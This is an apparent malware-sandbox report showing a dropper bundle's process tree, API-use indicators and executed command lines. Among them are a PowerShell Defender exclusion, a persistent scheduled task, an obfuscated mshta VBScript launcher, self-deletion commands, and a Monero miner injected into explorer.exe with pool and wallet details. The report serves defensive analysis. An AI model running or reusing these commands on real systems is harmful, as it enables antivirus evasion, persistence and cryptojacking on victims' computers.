Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeDebugPrivilege	3720	BearVpn 3.exe
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeRestorePrivilege	4924	WerFault.exe
Token: SeBackupPrivilege	4924	WerFault.exe
Token: SeDebugPrivilege	4896	rundll32.exe
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeDebugPrivilege	4896	rundll32.exe
Token: SeDebugPrivilege	2556	svchost.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
3036	Explorer.EXE
416	setup_2.tmp
5964	ultramediaburner.tmp
4220	installer.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3036	Explorer.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3036	Explorer.EXE
6064	MicrosoftEdge.exe
2176	MicrosoftEdgeCP.exe
2176	MicrosoftEdgeCP.exe
7008	cmd.exe
6312	MicrosoftEdge.exe
3092	MicrosoftEdgeCP.exe
3092	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4072 wrote to memory of 3480	4072	setup_x86_x64_install.exe	75
PID 4072 wrote to memory of 3480	4072	setup_x86_x64_install.exe	75
PID 4072 wrote to memory of 3480	4072	setup_x86_x64_install.exe	75
PID 3480 wrote to memory of 2804	3480	setup_installer.exe	76
PID 3480 wrote to memory of 2804	3480	setup_installer.exe	76
PID 3480 wrote to memory of 2804	3480	setup_installer.exe	76
PID 2804 wrote to memory of 2936	2804	setup_install.exe	81
PID 2804 wrote to memory of 2936	2804	setup_install.exe	81
PID 2804 wrote to memory of 2936	2804	setup_install.exe	81
PID 2804 wrote to memory of 4072	2804	setup_install.exe	80
PID 2804 wrote to memory of 4072	2804	setup_install.exe	80
PID 2804 wrote to memory of 4072	2804	setup_install.exe	80
PID 2804 wrote to memory of 4056	2804	setup_install.exe	79
PID 2804 wrote to memory of 4056	2804	setup_install.exe	79
PID 2804 wrote to memory of 4056	2804	setup_install.exe	79
PID 2804 wrote to memory of 740	2804	setup_install.exe	83
PID 2804 wrote to memory of 740	2804	setup_install.exe	83
PID 2804 wrote to memory of 740	2804	setup_install.exe	83
PID 2804 wrote to memory of 2240	2804	setup_install.exe	82
PID 2804 wrote to memory of 2240	2804	setup_install.exe	82
PID 2804 wrote to memory of 2240	2804	setup_install.exe	82
PID 2804 wrote to memory of 4100	2804	setup_install.exe	84
PID 2804 wrote to memory of 4100	2804	setup_install.exe	84
PID 2804 wrote to memory of 4100	2804	setup_install.exe	84
PID 2804 wrote to memory of 4120	2804	setup_install.exe	97
PID 2804 wrote to memory of 4120	2804	setup_install.exe	97
PID 2804 wrote to memory of 4120	2804	setup_install.exe	97
PID 2804 wrote to memory of 4140	2804	setup_install.exe	96
PID 2804 wrote to memory of 4140	2804	setup_install.exe	96
PID 2804 wrote to memory of 4140	2804	setup_install.exe	96
PID 2804 wrote to memory of 4160	2804	setup_install.exe	85
PID 2804 wrote to memory of 4160	2804	setup_install.exe	85
PID 2804 wrote to memory of 4160	2804	setup_install.exe	85
PID 2804 wrote to memory of 4180	2804	setup_install.exe	86
PID 2804 wrote to memory of 4180	2804	setup_install.exe	86
PID 2804 wrote to memory of 4180	2804	setup_install.exe	86
PID 2804 wrote to memory of 4200	2804	setup_install.exe	87
PID 2804 wrote to memory of 4200	2804	setup_install.exe	87
PID 2804 wrote to memory of 4200	2804	setup_install.exe	87
PID 2240 wrote to memory of 4220	2240	cmd.exe	95
PID 2240 wrote to memory of 4220	2240	cmd.exe	95
PID 2240 wrote to memory of 4220	2240	cmd.exe	95
PID 2936 wrote to memory of 4248	2936	cmd.exe	88
PID 2936 wrote to memory of 4248	2936	cmd.exe	88
PID 2936 wrote to memory of 4248	2936	cmd.exe	88
PID 4056 wrote to memory of 4272	4056	cmd.exe	89
PID 4056 wrote to memory of 4272	4056	cmd.exe	89
PID 4056 wrote to memory of 4272	4056	cmd.exe	89
PID 4100 wrote to memory of 4284	4100	cmd.exe	90
PID 4100 wrote to memory of 4284	4100	cmd.exe	90
PID 740 wrote to memory of 4308	740	cmd.exe	129
PID 740 wrote to memory of 4308	740	cmd.exe	129
PID 740 wrote to memory of 4308	740	cmd.exe	129
PID 4072 wrote to memory of 4320	4072	cmd.exe	93
PID 4072 wrote to memory of 4320	4072	cmd.exe	93
PID 4072 wrote to memory of 4320	4072	cmd.exe	93
PID 4140 wrote to memory of 4332	4140	cmd.exe	92
PID 4140 wrote to memory of 4332	4140	cmd.exe	92
PID 4120 wrote to memory of 4340	4120	cmd.exe	91
PID 4120 wrote to memory of 4340	4120	cmd.exe	91
PID 4120 wrote to memory of 4340	4120	cmd.exe	91
PID 4160 wrote to memory of 4456	4160	cmd.exe	98
PID 4160 wrote to memory of 4456	4160	cmd.exe	98
PID 4200 wrote to memory of 4492	4200	cmd.exe	99

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:884
- C:\Users\Admin\AppData\Roaming\wtbbrhc
  C:\Users\Admin\AppData\Roaming\wtbbrhc
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1388
- C:\Users\Admin\AppData\Roaming\wtbbrhc
  C:\Users\Admin\AppData\Roaming\wtbbrhc
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6564
- C:\Users\Admin\AppData\Roaming\wtbbrhc
  C:\Users\Admin\AppData\Roaming\wtbbrhc
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:984

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:1128

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2636

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3036
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2804
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun052bbd8bebd9.exe
        
        Sun052bbd8bebd9.exe
        6⤵
        Executes dropped EXE
        
        PID:4272
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4072
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05ac1b0207d3ff3b8.exe
        
        Sun05ac1b0207d3ff3b8.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies system certificate store
        
        PID:4320
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:6172
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun05ac1b0207d3ff3b8.exe /f
        8⤵
        Kills process with taskkill
        
        PID:6244
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:6420
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2936
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4248
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2240
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05640630a6aa.exe
        
        Sun05640630a6aa.exe
        6⤵
        Executes dropped EXE
        
        PID:4220
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:740
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05532f7abc.exe
        
        Sun05532f7abc.exe
        6⤵
        
        PID:4308
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4100
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun059375dac544fc4a.exe
        
        Sun059375dac544fc4a.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        7⤵
        Executes dropped EXE
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        8⤵
        Executes dropped EXE
        
        PID:5072
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:5332
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:4956
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4496
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        10⤵
        
        PID:5516
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        11⤵
        Creates scheduled task(s)
        
        PID:3788
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        10⤵
        Executes dropped EXE
        
        PID:6868
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        10⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        Executes dropped EXE
        
        PID:860
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 808
        9⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        
        PID:1788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 836
        9⤵
        Program crash
        
        PID:3752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 888
        9⤵
        Program crash
        
        PID:5184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 896
        9⤵
        Program crash
        
        PID:5524
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 960
        9⤵
        Program crash
        
        PID:5768
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 840
        9⤵
        Program crash
        
        PID:6068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1052
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:648
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 648 -s 1976
        9⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        8⤵
        Executes dropped EXE
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\is-I46BC.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I46BC.tmp\setup_2.tmp" /SL5="$301E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\is-5PK0R.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5PK0R.tmp\setup_2.tmp" /SL5="$2011A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        8⤵
        Executes dropped EXE
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        9⤵
        Executes dropped EXE
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4292
        
        C:\ProgramData\8917362.exe
        
        "C:\ProgramData\8917362.exe"
        9⤵
        Executes dropped EXE
        
        PID:5264
        
        C:\ProgramData\7616646.exe
        
        "C:\ProgramData\7616646.exe"
        9⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5312
        
        C:\ProgramData\2967757.exe
        
        "C:\ProgramData\2967757.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5500
        
        C:\ProgramData\2967757.exe
        
        "C:\ProgramData\2967757.exe"
        10⤵
        Executes dropped EXE
        
        PID:5856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 952
        10⤵
        Program crash
        
        PID:5972
        
        C:\ProgramData\7869575.exe
        
        "C:\ProgramData\7869575.exe"
        9⤵
        Executes dropped EXE
        
        PID:5752
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\7869575.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\7869575.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        10⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\7869575.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\7869575.exe") do taskkill -Im "%~nxl" /F
        11⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE
        
        C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
        12⤵
        Executes dropped EXE
        
        PID:5408
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        13⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
        14⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
        13⤵
        Loads dropped DLL
        
        PID:4464
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -Im "7869575.exe" /F
        12⤵
        Kills process with taskkill
        
        PID:5640
        
        C:\ProgramData\4365899.exe
        
        "C:\ProgramData\4365899.exe"
        9⤵
        Executes dropped EXE
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        8⤵
        Executes dropped EXE
        
        PID:2708
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4160
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05899db881f67fb29.exe
        
        Sun05899db881f67fb29.exe
        6⤵
        Executes dropped EXE
        
        PID:4456
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
        5⤵
        
        PID:4180
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun054fe19a12cb3.exe
        
        Sun054fe19a12cb3.exe
        6⤵
        Executes dropped EXE
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\is-2HBE1.tmp\Sun054fe19a12cb3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2HBE1.tmp\Sun054fe19a12cb3.tmp" /SL5="$200D4,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun054fe19a12cb3.exe"
        7⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\is-EEK9F.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EEK9F.tmp\46807GHF____.exe" /S /UID=burnerch2
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:4356
        
        C:\Program Files\Internet Explorer\KOPZYUGYSG\ultramediaburner.exe
        
        "C:\Program Files\Internet Explorer\KOPZYUGYSG\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\is-GSIN1.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GSIN1.tmp\ultramediaburner.tmp" /SL5="$40204,281924,62464,C:\Program Files\Internet Explorer\KOPZYUGYSG\ultramediaburner.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5964
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        11⤵
        Executes dropped EXE
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\2f-890df-0a6-ecc83-4ecdc3fb5625f\Syvyxexaexu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2f-890df-0a6-ecc83-4ecdc3fb5625f\Syvyxexaexu.exe"
        9⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\09-9539e-901-8a78b-9123df1ff4d87\Kymiqofowae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\09-9539e-901-8a78b-9123df1ff4d87\Kymiqofowae.exe"
        9⤵
        Executes dropped EXE
        
        PID:5464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\53qdkzxq.inb\GcleanerEU.exe /eufive & exit
        10⤵
        
        PID:6940
        
        C:\Users\Admin\AppData\Local\Temp\53qdkzxq.inb\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\53qdkzxq.inb\GcleanerEU.exe /eufive
        11⤵
        Executes dropped EXE
        
        PID:3092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vtq2djbh.tli\installer.exe /qn CAMPAIGN="654" & exit
        10⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\vtq2djbh.tli\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vtq2djbh.tli\installer.exe /qn CAMPAIGN="654"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:4220
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vtq2djbh.tli\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vtq2djbh.tli\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171483 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        12⤵
        
        PID:6404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tqlgnn3x.fy4\anyname.exe & exit
        10⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\tqlgnn3x.fy4\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\tqlgnn3x.fy4\anyname.exe
        11⤵
        Executes dropped EXE
        
        PID:4272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3v5pttmi.alv\gcleaner.exe /mixfive & exit
        10⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\3v5pttmi.alv\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\3v5pttmi.alv\gcleaner.exe /mixfive
        11⤵
        Executes dropped EXE
        
        PID:1132
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iwrp5wj0.pcj\autosubplayer.exe /S & exit
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4200
      - C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05fa3b4d2ae56e.exe
        
        Sun05fa3b4d2ae56e.exe /mixone
        6⤵
        Executes dropped EXE
        
        PID:4492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 656
        7⤵
        Program crash
        
        PID:4924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 672
        7⤵
        Program crash
        
        PID:2500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 676
        7⤵
        Program crash
        
        PID:4920
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 672
        7⤵
        Program crash
        
        PID:5368
        
